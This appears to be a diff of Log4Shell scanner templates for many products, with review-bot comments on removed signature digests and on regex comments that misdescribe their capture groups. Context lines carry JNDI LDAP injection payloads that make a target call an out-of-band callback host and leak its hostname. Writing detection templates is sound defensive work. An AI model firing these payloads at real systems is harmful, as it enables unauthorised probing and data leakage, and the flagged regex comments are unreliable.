diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index d71c5a3652..6177bcd577 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -35,6 +35,7 @@ http: - | GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 Host: {{Hostname}} + - | GET / HTTP/1.1 Host: {{Hostname}} @@ -58,7 +59,6 @@ http: X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}} stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -74,7 +74,7 @@ http: extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 @@ -86,5 +86,4 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - part: interactsh_request -# digest: 4b0a00483046022100cdec4b5d8980cc136a59c99bdf67592c090c7e3f38099f240f8e632a3a1716bd022100b6df914d5c1c27af20c1aeb0f9ac78a20ff66f9e04e188c0bbf641443db1ef02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 38d258b42a..01b594c0d3 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -66,7 +66,7 @@ http: extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 @@ -77,5 +77,4 @@ http: group: 1 regex: - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output - part: interactsh_request -# digest: 4a0a00473045022100c60fb46ec715ed6c4218ace6f3f46cdee865c987b0e3cb1a7d36621319e40819022056b9f2ed8a695079a54387d8d7cf81b255d60d203871db28aad5a34c07024ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file 
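Review bot: The last hunk of CVE-2021-44228.yaml removes the `# digest:` trailer without adding a new one, so the new side of the template carries no digest line at all; every other file section in this diff drops its trailer the same way. If that trailer is the template's signature, which its shape suggests, the edited templates should be re-signed before they ship, or the description should state that a post-merge job does it, so that consumers which verify signatures do not load them as unsigned. The new last line `part: interactsh_request` is also marked `\ No newline at end of file`; ending each file with a newline keeps a later appended trailer on its own line.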
diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 27d56bb26b..e4a127636d 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -42,20 +42,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100d00b7aa2d5fc2cf73ebc5413a3019767ef23cc4180b3335c7c9b6258c1d9435b0221008ccd0daf25810e5c58d9bd86ea2afe24c55ea36a88369c6f0258d09dc7fd1b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 1dcb9f3d08..3f3f23833f 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml 
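Review bot: The comments added next to the regex in apache-ofbiz-log4j-rce.yaml do not match what the pattern captures, and the same lines recur in the other log4j sections of this diff. `\d{6}\.` sits outside the first capture, so the `group: 1` extractor yields only the host part, not `${:-{{rand1}}}${:-{{rand2}}}.${hostName}`, and the identical comment on the matcher line describes printing although a matcher prints nothing. The first capture `([a-zA-Z0-9\.\-]+)` is greedy and accepts dots, so `group: 2` is the injection point only when exactly three labels follow it; with a longer interaction domain it would hold a later label, which can mislead triage. I would state that assumption in the comment, for example `# <6 digits>.<hostName>.<injection point>.<3-label interaction domain>; group 1 = hostName, group 2 = injection point`. The hunk starts and ends inside the `http:` block, so the request that builds the callback name is not visible here.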
@@ -55,20 +55,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100dff546abd1c1e52272d68cc689729d7dc1d7c01592bb9d190c3e341a4ef1589f022009b0a0a3bae2340288fe8bb13505dc8796bd42f342a68fbe987e27b0c715e100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index ba28756c50..34a2f03b02 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml 
@@ -52,20 +52,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100d198ac01af3dc8bde3d25f49bd41b5a8268aab1617dfd11cae4bde977db88f30022100b24c3f88bee3eb6548048575e454334964b5718816e7822da6631a0c83e68f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index a7e3d5129d..6b0f2fdd23 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml 
@@ -51,20 +51,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402204424d1b4c2ca756d2efe801b61859c28cc5facffd3f3e4877975d0ac6074e1fe02203eecf6378824ef30aa1c761d41d9768ad11e42700caf148aa90fa8483a9c4769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 1e4e230727..09b37aafc1 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml 
@@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402202603ae664b279e6055139e3d6fa89c744ba9d7bea89035d6a74f8fc5813e688d02207445fffe3cff7440d500f138193a25d8995e5c4da30c7d26f18bfc50c43453ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index d077d74342..efc8787267 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml 
@@ -42,20 +42,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100d514fdc8236eb4a3d7e30f0d03dde613b2369e2ebcce1164795a44f45d73649f02203bb36fa5f1165f96f8993fd90d5fea37284702557e484e7428891ff09b8d542c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index e246a75a15..055250d457 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml 
@@ -51,20 +51,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a0047304502205dc4953c115d06cb7f71f87981a60e87c24769618f1795d9ce80a988b210f12e022100fe46ec47b7fc95edad6766539c2444ff012019d14680d45f79210fc693d9c128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index d812d59a0d..ff98a1ae66 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml 
@@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a004730450221008f9e5730500675fa4925e8e899fde41bd5825b8e0cbd90da49b1c77ccaf46de802203f967f91f213d910140e390b564d60705c8210764386109bd553f4d1a452e153:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 685f52f6e6..44115cca5a 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml 
@@ -47,20 +47,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100c16edd83e05c94591418430a6e0d02229617c11c9bfa14b9160652d1c04a9df002206bc2f82e47ddf948eae00a265b6088f5f70a47511aa28b5f520e0e0e2a786413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index fe643c44dd..0f3e609bc8 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -49,7 +49,7 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex 
@@ -62,15 +62,16 @@ http: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402201afb2e9417d23c2ea5368ccdfa0445cf3517d34b8db7f1b1d1a7defdb6cfa2cb022003c6ba2ee9d8d3d0eae58e5dc118e86f51e2a8ce68176a5012c83c0e3edd0b67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 0198af25e5..51b7e9466b 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -52,20 +52,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100ccc0573689b16d9bd838b2cfb5413a29132d6ee56a8c64a8681041188b6b3547022100e1fc3a7b8ff5cb752a894725af76ff9de1aebc03db85cfe5804168f4c7d6ef20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file 
diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index a3e5e658e7..7da6c35dff 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -43,20 +43,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100dbbf7b611410f248325e1c76e5b42ef46f2a3ed5e99dac5a7771351a0b9d089b022100b9b7bc718ff9252518c7ad0de841a4f78da98db5dd7c35dd15a77fd4e4b06273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 929eb16241..a93f9171a4 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml 
@@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022057f2fba3cf03ecda6d62398b7a33c35412da550ce0c0ed2e9b7efda5743b0aae022100d133541112f6985ba8a61e752a22887ebe5093fead4bf1d338a8db4a21efbcf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index 370e0629a9..da29ba0a68 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml 
@@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a00463044022052eb1e9d2ac6b84a6a306516b90c92df82ffb02d8c3d76c6bab2945c3d9010d102204f46bd311bece2e0552a805f48b833c5a315fb7701489b934a3cf586e2132ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index ef09ef1ce2..e689f0c69b 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml 
@@ -46,20 +46,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402201f00b763e60670eec4283cda688678c4e072812d507e7c066d8a72b2c11a84e7022044154ccfa0a8df95360d1e8c2cd27aa00ee74f2285de0e049f96f5ea8297180b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index 8d6e654328..ac57369a16 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml 
@@ -44,20 +44,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100b57bf84433fbff96d04708b92b9957bee63cbac77446b0273cbd2888976457ce02203d18d48e50e0476b5f99e8a86515c9ffc4ce8735f352d248b0cb1f3cabf4a416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index 4fe2319692..cb7f348550 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml 
@@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a00473045022100fab4ecc41af0191778534b4efdb7edf6c61d25404c616aa1cda9a5dd3b577739022057b251f28bce03d9d78a089ff41f154631efc03ce5f1079318dcc433d9f8c10c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index 66b8809de2..6995f768d0 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml 
@@ -40,20 +40,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a00463044022021f25a1985d55a727c597cbdaaf28bdf2a5b7519e4c6440907998f73d6766ad202207c93c7fc8670170f175a470f6e3845413b8e8ec6fdfe6f84d2f67fb0fbcb7387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index 8841fdc897..0f44b2e6e3 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml 
